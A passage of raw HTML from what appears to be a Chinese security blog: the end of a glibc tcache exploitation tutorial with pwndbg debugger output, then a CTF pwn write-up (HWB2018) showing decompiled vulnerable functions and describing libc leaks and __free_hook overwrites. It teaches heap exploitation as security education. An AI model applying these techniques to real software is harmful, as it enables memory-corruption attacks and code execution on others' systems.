class="nf">R13</span> <span class="mi">0x7fffffffe0b0</span> <span class="err">◂—</span> <span class="mi">0x1</span> <span class="nf">R14</span> <span class="mi">0x0</span> <span class="nf">R15</span> <span class="mi">0x0</span> <span class="nf">RBP</span> <span class="mi">0x7fffffffdfd0</span> <span class="err">—▸</span> <span class="mi">0x555555554870</span> <span class="p">(</span><span class="no">__libc_csu_init</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">r15</span> <span class="nf">RSP</span> <span class="mi">0x7fffffffdfb0</span> <span class="err">—▸</span> <span class="mi">0x555555554870</span> <span class="p">(</span><span class="no">__libc_csu_init</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">r15</span> <span class="nf">RIP</span> <span class="mi">0x555555554808</span> <span class="p">(</span><span class="no">main</span><span class="err">+</span><span class="mi">174</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">mov</span> <span class="no">rax</span><span class="p">,</span> <span class="no">qword</span> <span class="no">ptr</span> <span class="p">[</span><span class="no">rip</span> <span class="err">+</span> <span class="mi">0x200851</span><span class="p">]</span> <span class="err">───────────────────────────────────────[</span> <span class="nf">DISASM</span> <span class="p">]</span><span class="err">────────────────────────────────────────</span> <span class="err">0</span><span class="nf">x5555555547f4</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">154</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">rdi</span><span class="p">,</span> <span class="no">rax</span> <span class="err">0</span><span class="nf">x5555555547f7</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">157</span><span class="err">&gt;</span> <span class="no">call</span> <span class="no">free@plt</span> <span class="err">&lt;</span><span class="mi">0x555555554600</span><span class="err">&gt;</span> <span class="err">0</span><span class="nf">x5555555547fc</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">162</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">rax</span><span class="p">,</span> <span class="no">qword</span> <span class="no">ptr</span> <span class="p">[</span><span class="no">rbp</span> <span class="p">-</span> <span class="mi">0x18</span><span class="p">]</span> <span class="err">0</span><span class="nf">x555555554800</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">166</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">rdi</span><span class="p">,</span> <span class="no">rax</span> <span class="err">0</span><span class="nf">x555555554803</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">169</span><span class="err">&gt;</span> <span class="no">call</span> <span class="no">free@plt</span> <span class="err">&lt;</span><span class="mi">0x555555554600</span><span class="err">&gt;</span> <span class="err">►</span> <span class="err">0</span><span class="nf">x555555554808</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">174</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">rax</span><span class="p">,</span> <span class="no">qword</span> <span class="no">ptr</span> <span class="p">[</span><span class="no">rip</span> <span class="err">+</span> <span class="mi">0x200851</span><span class="p">]</span> <span class="err">&lt;</span><span class="mi">0x555555755060</span><span class="err">&gt;</span> <span class="err">0</span><span class="nf">x55555555480f</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">181</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">rcx</span><span class="p">,</span> <span class="no">qword</span> <span class="no">ptr</span> <span class="p">[</span><span class="no">rbp</span> <span class="p">-</span> <span class="mi">0x18</span><span class="p">]</span> <span class="err">0</span><span class="nf">x555555554813</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">185</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">rdx</span><span class="p">,</span> <span class="no">qword</span> <span class="no">ptr</span> <span class="p">[</span><span class="no">rbp</span> <span class="p">-</span> <span class="mi">0x18</span><span class="p">]</span> <span class="err">0</span><span class="nf">x555555554817</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">189</span><span class="err">&gt;</span> <span class="no">lea</span> <span class="no">rsi</span><span class="p">,</span> <span class="p">[</span><span class="no">rip</span> <span class="err">+</span> <span class="mi">0x152</span><span class="p">]</span> <span class="err">0</span><span class="nf">x55555555481e</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">196</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">rdi</span><span class="p">,</span> <span class="no">rax</span> <span class="err">0</span><span class="nf">x555555554821</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">199</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">eax</span><span class="p">,</span> <span class="mi">0</span> <span class="err">────────────────────────────────────[</span> <span class="nf">SOURCE</span> <span class="p">(</span><span class="no">CODE</span><span class="p">)</span> <span class="p">]</span><span class="err">────────────────────────────────────</span> <span class="err">11</span> <span class="nf">fprintf</span><span class="p">(</span><span class="no">stderr</span><span class="p">,</span> <span class="err">&#34;</span><span class="no">malloc</span><span class="p">(</span><span class="mi">8</span><span class="p">):</span> <span class="nv">%p</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">,</span> <span class="no">a</span><span class="p">)</span><span class="c">; </span><span class="c"></span> <span class="mi">12</span> <span class="no">fprintf</span><span class="p">(</span><span class="no">stderr</span><span class="p">,</span> <span class="err">&#34;</span><span class="no">Freeing</span> <span class="no">twice...</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">)</span><span class="c">; </span><span class="c"></span> <span class="mi">13</span> <span class="no">free</span><span class="p">(</span><span class="no">a</span><span class="p">)</span><span class="c">; </span><span class="c"></span> <span class="mi">14</span> <span class="no">free</span><span class="p">(</span><span class="no">a</span><span class="p">)</span><span class="c">; </span><span class="c"></span> <span class="mi">15</span> <span class="err">►</span> <span class="mi">16</span> <span class="no">fprintf</span><span class="p">(</span><span class="no">stderr</span><span class="p">,</span> <span class="err">&#34;</span><span class="no">Now</span> <span class="no">the</span> <span class="no">free</span> <span class="no">list</span> <span class="no">has</span> <span class="p">[</span> <span class="nv">%p</span><span class="p">,</span> <span class="nv">%p</span> <span class="p">].</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">,</span> <span class="no">a</span><span class="p">,</span> <span class="no">a</span><span class="p">)</span><span class="c">; </span><span class="c"></span> <span class="mi">17</span> <span class="no">fprintf</span><span class="p">(</span><span class="no">stderr</span><span class="p">,</span> <span class="err">&#34;</span><span class="no">Next</span> <span class="no">allocated</span> <span class="no">buffers</span> <span class="no">will</span> <span class="no">be</span> <span class="no">same</span><span class="p">:</span> <span class="p">[</span> <span class="nv">%p</span><span class="p">,</span> <span class="nv">%p</span> <span class="p">].</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">,</span> <span class="no">malloc</span><span class="p">(</span><span class="mi">8</span><span class="p">),</span> <span class="no">malloc</span><span class="p">(</span><span class="mi">8</span><span class="p">))</span><span class="c">; </span><span class="c"></span> <span class="mi">18</span> <span class="mi">19</span> <span class="no">return</span> <span class="mi">0</span><span class="c">; </span><span class="c"></span> <span class="mi">20</span> <span class="err">}</span> <span class="err">────────────────────────────────────────[</span> <span class="nf">STACK</span> <span class="p">]</span><span class="err">────────────────────────────────────────</span> <span class="err">00:0000│</span> <span class="nf">rsp</span> <span class="mi">0x7fffffffdfb0</span> <span class="err">—▸</span> <span class="mi">0x555555554870</span> <span class="p">(</span><span class="no">__libc_csu_init</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">r15</span> <span class="err">01:0008│</span> <span class="err">0</span><span class="nf">x7fffffffdfb8</span> <span class="err">—▸</span> <span class="mi">0x555555756260</span> <span class="err">◂—</span> <span class="mi">0x555555756260</span> <span class="err">/</span><span class="p">*</span> <span class="err">&#39;`</span><span class="no">buUUU</span><span class="err">&#39;</span> <span class="p">*</span><span class="err">/</span> <span class="err">02:0010│</span> <span class="err">0</span><span class="nf">x7fffffffdfc0</span> <span class="err">—▸</span> <span class="mi">0x7fffffffe0b0</span> <span class="err">◂—</span> <span class="mi">0x1</span> <span class="err">03:0018│</span> <span class="err">0</span><span class="nf">x7fffffffdfc8</span> <span class="err">◂—</span> <span class="mi">0x0</span> <span class="err">04:0020│</span> <span class="nf">rbp</span> <span class="mi">0x7fffffffdfd0</span> <span class="err">—▸</span> <span class="mi">0x555555554870</span> <span class="p">(</span><span class="no">__libc_csu_init</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">r15</span> <span class="err">05:0028│</span> <span class="err">0</span><span class="nf">x7fffffffdfd8</span> <span class="err">—▸</span> <span class="mi">0x7ffff7a3fa87</span> <span class="p">(</span><span class="no">__libc_start_main</span><span class="err">+</span><span class="mi">231</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">mov</span> <span class="no">edi</span><span class="p">,</span> <span class="no">eax</span> <span class="err">06:0030│</span> <span class="err">0</span><span class="nf">x7fffffffdfe0</span> <span class="err">◂—</span> <span class="mi">0x0</span> <span class="err">07:0038│</span> <span class="err">0</span><span class="nf">x7fffffffdfe8</span> <span class="err">—▸</span> <span class="mi">0x7fffffffe0b8</span> <span class="err">—▸</span> <span class="mi">0x7fffffffe3d8</span> <span class="err">◂—</span> <span class="mi">0x346d2f656d6f682f</span> <span class="p">(</span><span class="err">&#39;/</span><span class="no">home</span><span class="err">/</span><span class="no">m4</span><span class="err">&#39;</span><span class="p">)</span> <span class="nf">pwndbg</span><span class="err">&gt;</span> <span class="no">heapinfo</span> <span class="err">3886144</span> <span class="err">(0</span><span class="nf">x20</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">0</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x30</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">1</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x40</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">2</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x50</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">3</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x60</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">4</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x70</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">5</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x80</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">6</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x90</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">7</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">xa0</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">8</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">xb0</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">9</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="nl">top:</span> <span class="err">0</span><span class="nf">x555555756270</span> <span class="p">(</span><span class="no">size</span> <span class="p">:</span> <span class="mi">0x20d90</span><span class="p">)</span> <span class="no">last_remainder</span><span class="p">:</span> <span class="mi">0x0</span> <span class="p">(</span><span class="no">size</span> <span class="p">:</span> <span class="mi">0x0</span><span class="p">)</span> <span class="no">unsortbin</span><span class="p">:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x20</span><span class="p">)</span> <span class="no">tcache_entry</span><span class="p">[</span><span class="mi">0</span><span class="p">]:</span> <span class="mi">0x555555756260</span> <span class="p">--</span><span class="err">&gt;</span> <span class="mi">0x555555756260</span> <span class="p">(</span><span class="no">overlap</span> <span class="no">chunk</span> <span class="no">with</span> <span class="mi">0x555555756250</span><span class="p">(</span><span class="no">freed</span><span class="p">)</span> <span class="p">)</span> </code></pre></td></tr></table> </div> </div><p>可以看出，这种方法与 <code>fastbin dup</code> 相比也简单了很多。</p> <h3 id="tcache-perthread-corruption">tcache perthread corruption</h3> <p>我们已经知道 <code>tcache_perthread_struct</code> 是整个 tcache 的管理结构，如果能控制这个结构体，那么无论我们 malloc 的 size 是多少，地址都是可控的。</p> <p>这里没找到太好的例子，自己想了一种情况</p> <p>设想有如下的堆排布情况</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">tcache_ +------------+ \perthread |...... | \_struct +------------+ |counts[i] | +------------+ |...... | +----------+ +------------+ |header | |entries[i] |---------&gt;+----------+ +------------+ |NULL | |...... | +----------+ | | | | +------------+ +----------+ </code></pre></td></tr></table> </div> </div><p>通过一些手段（如 <code>tcache posioning</code>），我们将其改为了</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">tcache_ +------------+&lt;---------------------------+ \perthread |...... | | \_struct +------------+ | |counts[i] | | +------------+ | |...... | +----------+ | +------------+ |header | | |entries[i] |---------&gt;+----------+ | +------------+ |target |------+ |...... | +----------+ | | | | +------------+ +----------+ </code></pre></td></tr></table> </div> </div><p>这样，两次 malloc 后我们就返回了 <code>tcache_prethread_struct</code> 的地址，就可以控制整个 tcache 了。</p> <p><strong>因为 tcache_prethread_struct 也在堆上，因此这种方法一般只需要 partial overwrite 就可以达到目的。</strong></p> <h2 id="references--thanks-to">References &amp; thanks to:</h2> <p><a href="https://code.woboq.org/userspace/glibc/malloc/malloc.c.html">https://code.woboq.org/userspace/glibc/malloc/malloc.c.html</a></p> <p><a href="http://tukan.farm/2017/07/08/tcache/">http://tukan.farm/2017/07/08/tcache/</a></p> <p><a href="https://github.com/bash-c/slides/blob/master/pwn_heap/tcache_exploitation.pdf">https://github.com/bash-c/slides/blob/master/pwn_heap/tcache_exploitation.pdf</a></p> <p><a href="https://www.secpulse.com/archives/71958.html">https://www.secpulse.com/archives/71958.html</a></p> https://bash-c.github.io/post/hwb2018-pwn-writeup/ Sat, 13 Oct 2018 22:29:11 +0800 https://bash-c.github.io/post/hwb2018-pwn-writeup/ <p>跟学校的队伍参加了又一次 <code>?网杯</code>，记录一下 pwn 的 writeup。</p> <h2 id="gettingstart">gettingstart</h2> <p><a href="https://github.com/bash-c/pwn_repo/tree/master/HWB2018_gettingstart">binary &amp; exploit here</a></p> <p>这道题没什么好说的（比签到题解出的人还多），(double) 0.1 在内存中的存储形式，可以参考 <a href="https://math.stackexchange.com/questions/1791562/converting-0-1-to-binary-64-bit-double">stackexchange</a></p> <h2 id="shoppingcart">shoppingcart</h2> <p><a href="https://github.com/bash-c/pwn_repo/tree/master/HWB2018_shoppingcart">binary &amp; exploit here</a></p> <p>这道题目真是坑了很久，看到 <code>strtoul</code> 就没想通过负数数组越界了，后来发现可以负数越界时已经来不及写 exp 了。比赛结束后通过堆风水解出了题目，后来看 <a href="https://xz.aliyun.com/t/2893#toc-6">白泽</a> 的师傅的解法时，发现更简单，这里就介绍一下师傅的解法，用到了 libc 的 got 机制。</p> <p>漏洞出现在 edit 功能里，存在数组越界，可以通过这个功能来 leak 和 overwrite。</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="kt">void</span> <span class="nf">edit</span><span class="p">()</span> <span class="p">{</span> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">idx</span><span class="p">;</span> <span class="c1">// rax </span><span class="c1"></span> <span class="kr">__int64</span> <span class="n">v1</span><span class="p">;</span> <span class="c1">// ST00_8 </span><span class="c1"></span> <span class="kt">char</span> <span class="n">s</span><span class="p">[</span><span class="mi">24</span><span class="p">];</span> <span class="c1">// [rsp+10h] [rbp-20h] </span><span class="c1"></span> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v3</span><span class="p">;</span> <span class="c1">// [rsp+28h] [rbp-8h] </span><span class="c1"></span> <span class="n">v3</span> <span class="o">=</span> <span class="n">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;Which goods you need to modify?&#34;</span><span class="p">);</span> <span class="n">fgets</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="n">stdin</span><span class="p">);</span> <span class="n">idx</span> <span class="o">=</span> <span class="n">strtoul</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="mi">0LL</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">&#34;OK, what would you like to modify %s to?</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">good_list</span><span class="p">[</span><span class="n">idx</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">good</span><span class="p">,</span> <span class="n">idx</span><span class="p">);</span> <span class="n">good_list</span><span class="p">[</span><span class="n">v1</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">good</span><span class="p">[</span><span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">good_list</span><span class="p">[</span><span class="n">v1</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">good</span><span class="p">,</span> <span class="mi">8uLL</span><span class="p">)]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>leak 时可以用 <code>malloc(0)</code>，这样在输入时 fd 就不会被 <code>\0</code> 截断</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;How long is your goods name?&#34;</span><span class="p">);</span> <span class="n">fgets</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="n">stdin</span><span class="p">);</span> <span class="n">size</span> <span class="o">=</span> <span class="n">strtoul</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="mi">0LL</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> <span class="n">p_g</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">GOOD</span> <span class="o">*</span><span class="p">)</span><span class="n">malloc</span><span class="p">(</span><span class="mh">0x10uLL</span><span class="p">);</span> <span class="n">p_g</span><span class="o">-&gt;</span><span class="n">money</span> <span class="o">=</span> <span class="mi">999LL</span><span class="p">;</span> <span class="n">p_g</span><span class="o">-&gt;</span><span class="n">good</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">malloc</span><span class="p">(</span><span class="n">size</span><span class="p">);</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;What is your goods name?&#34;</span><span class="p">);</span> <span class="n">p_g</span><span class="o">-&gt;</span><span class="n">good</span><span class="p">[(</span><span class="kt">signed</span> <span class="kt">int</span><span class="p">)</span><span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">p_g</span><span class="o">-&gt;</span><span class="n">good</span><span class="p">,</span> <span class="n">size</span><span class="p">)</span> <span class="o">-</span> <span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span><span class="c1">// size == 0 </span></code></pre></td></tr></table> </div> </div><p>这样通过 unsorted bin leak 就能 leak 出一个和 <a href="https://github.com/bash-c/main_arena_offset#install">main_arena</a> 相关的地址，通过这个地址可以找到 libc 的基址。</p> <p>leak 完之后再次通过越界写改 <code>__free_hook</code> 即可，我的做法是通过堆风水，比较麻烦。后来发现白泽的师傅使用了 <code>libc.got['__free_hook']</code>，改写 <code>__free_hook</code> 的 got，这样实现起来就方便很多了。</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-asm" data-lang="asm"><span class="nf">pwndbg</span><span class="err">&gt;</span> <span class="no">codebase</span> <span class="no">codebase</span> <span class="p">:</span> <span class="mi">0x55d24159a000</span> <span class="nf">pwndbg</span><span class="err">&gt;</span> <span class="no">telescope</span> <span class="p">(</span><span class="mi">0x2021E0</span><span class="err">+</span><span class="mi">0x55d24159a000</span><span class="p">-</span><span class="mi">0xb0</span><span class="p">)</span> <span class="mi">00</span><span class="p">:</span><span class="mi">0000</span><span class="err">│</span> <span class="mi">0x55d24179c130</span> <span class="err">◂—</span> <span class="mi">0xa3831</span> <span class="err">/</span><span class="p">*</span> <span class="err">&#39;</span><span class="mi">18</span><span class="err">\</span><span class="no">n</span><span class="err">&#39;</span> <span class="p">*</span><span class="err">/</span> <span class="err">01:0008│</span> <span class="err">0</span><span class="nf">x55d24179c138</span> <span class="err">—▸</span> <span class="mi">0x7f9aa4cbcef8</span> <span class="err">—▸</span> <span class="mi">0x7f9aa4cbf7a8</span> <span class="p">(</span><span class="no">__free_hook</span><span class="p">)</span> <span class="err">◂—</span> <span class="mi">0x0</span> <span class="err">02:0010│</span> <span class="err">0</span><span class="nf">x55d24179c140</span> <span class="err">—▸</span> <span class="mi">0x55d241c32400</span> <span class="err">◂—</span> <span class="mi">0x0</span> <span class="err">03:0018│</span> <span class="err">0</span><span class="nf">x55d24179c148</span> <span class="err">—▸</span> <span class="mi">0x55d241c32450</span> <span class="err">—▸</span> <span class="mi">0x55d24179c0a8</span> <span class="err">◂—</span> <span class="mi">0xa31</span> <span class="err">/</span><span class="p">*</span> <span class="err">&#39;</span><span class="mi">1</span><span class="err">\</span><span class="no">n</span><span class="err">&#39;</span> <span class="p">*</span><span class="err">/</span> <span class="err">04:0020│</span> <span class="err">0</span><span class="nf">x55d24179c150</span> <span class="err">—▸</span> <span class="mi">0x55d241c32470</span> <span class="err">—▸</span> <span class="mi">0x55d24179c0b0</span> <span class="err">◂—</span> <span class="mi">0xa32</span> <span class="err">/</span><span class="p">*</span> <span class="err">&#39;</span><span class="mi">2</span><span class="err">\</span><span class="no">n</span><span class="err">&#39;</span> <span class="p">*</span><span class="err">/</span> <span class="err">05:0028│</span> <span class="err">0</span><span class="nf">x55d24179c158</span> <span class="err">—▸</span> <span class="mi">0x55d241c32490</span> <span class="err">—▸</span> <span class="mi">0x55d24179c0b8</span> <span class="err">◂—</span> <span class="mi">0xa33</span> <span class="err">/</span><span class="p">*</span> <span class="err">&#39;</span><span class="mi">3</span><span class="err">\</span><span class="no">n</span><span class="err">&#39;</span> <span class="p">*</span><span class="err">/</span> <span class="err">06:0030│</span> <span class="err">0</span><span class="nf">x55d24179c160</span> <span class="err">—▸</span> <span class="mi">0x55d241c324b0</span> <span class="err">—▸</span> <span class="mi">0x55d24179c0c0</span> <span class="err">◂—</span> <span class="mi">0xa34</span> <span class="err">/</span><span class="p">*</span> <span class="err">&#39;</span><span class="mi">4</span><span class="err">\</span><span class="no">n</span><span class="err">&#39;</span> <span class="p">*</span><span class="err">/</span> <span class="err">07:0038│</span> <span class="err">0</span><span class="nf">x55d24179c168</span> <span class="err">—▸</span> <span class="mi">0x55d241c324d0</span> <span class="err">—▸</span> <span class="mi">0x55d24179c0c8</span> <span class="err">◂—</span> <span class="mi">0xa35</span> <span class="err">/</span><span class="p">*</span> <span class="err">&#39;</span><span class="mi">5</span><span class="err">\</span><span class="no">n</span><span class="err">&#39;</span> <span class="p">*</span><span class="err">/</span> </code></pre></td></tr></table> </div> </div><h2 id="huwang">huwang</h2> <p><a href="https://github.com/bash-c/pwn_repo/tree/master/HWB2018_huwang">binary &amp; exploit here</a></p> <blockquote> <p>听 charlie 师傅说这道题目抄了他给国赛出的题。。。</p> </blockquote> <p>堆的功能没用，完全是硬加上去的。主要的逻辑在 666 这个选项里，功能是从 <code>/dev/urandom</code> 中读取 0xC 个字符，然后经过 n 轮 md5 运算，最后和用户的输入进行比较，如果比较成功则进入另一个有明显漏洞的函数，可以 leak 出 canary，stack 等信息，最后可以栈溢出，比较不成功则程序退出。</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="kt">void</span> <span class="kr">__fastcall</span> <span class="nf">secret_in_secret</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">rdi0</span><span class="p">)</span> <span class="p">{</span> <span class="kt">char</span> <span class="n">v1</span><span class="p">;</span> <span class="c1">// ST1B_1 </span><span class="c1"></span> <span class="kt">int</span> <span class="n">s_len</span><span class="p">;</span> <span class="c1">// [rsp+1Ch] [rbp-214h] </span><span class="c1"></span> <span class="kt">char</span> <span class="n">occupation</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span> <span class="c1">// [rsp+20h] [rbp-210h] </span><span class="c1"></span> <span class="kt">char</span> <span class="n">s</span><span class="p">[</span><span class="mi">264</span><span class="p">];</span> <span class="c1">// [rsp+120h] [rbp-110h] </span><span class="c1"></span> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v5</span><span class="p">;</span> <span class="c1">// [rsp+228h] [rbp-8h] </span><span class="c1"></span> <span class="n">v5</span> <span class="o">=</span> <span class="n">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">&#34;Congratulations, %s guessed my secret!</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">rdi0</span><span class="p">);</span><span class="c1">// leak </span><span class="c1"></span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;And I want to know someting about you, and introduce you to other people who guess the secret!&#34;</span><span class="p">);</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;What`s your occupation?&#34;</span><span class="p">);</span> <span class="n">get_str</span><span class="p">(</span><span class="n">occupation</span><span class="p">,</span> <span class="mi">255LL</span><span class="p">);</span> <span class="n">s_len</span> <span class="o">=</span> <span class="n">snprintf</span><span class="p">(</span> <span class="n">s</span><span class="p">,</span> <span class="mi">255uLL</span><span class="p">,</span> <span class="s">&#34;I know a new friend, his name is %s,and he is a noble %s.He is come from north and he is very handsome......&#34;</span> <span class="s">&#34;....................................................................................................&#34;</span><span class="p">,</span> <span class="n">rdi0</span><span class="p">,</span> <span class="n">occupation</span><span class="p">);</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;Here is your introduce&#34;</span><span class="p">);</span> <span class="n">puts</span><span class="p">(</span><span class="n">s</span><span class="p">);</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;Do you want to edit you introduce by yourself[Y/N]&#34;</span><span class="p">);</span> <span class="n">v1</span> <span class="o">=</span> <span class="n">getchar</span><span class="p">();</span> <span class="n">getchar</span><span class="p">();</span> <span class="k">if</span> <span class="p">(</span> <span class="n">v1</span> <span class="o">==</span> <span class="sc">&#39;Y&#39;</span> <span class="p">)</span> <span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">s</span><span class="p">,</span> <span class="n">s_len</span> <span class="o">-</span> <span class="mi">1</span><span class="p">);</span> <span class="c1">// overflow </span><span 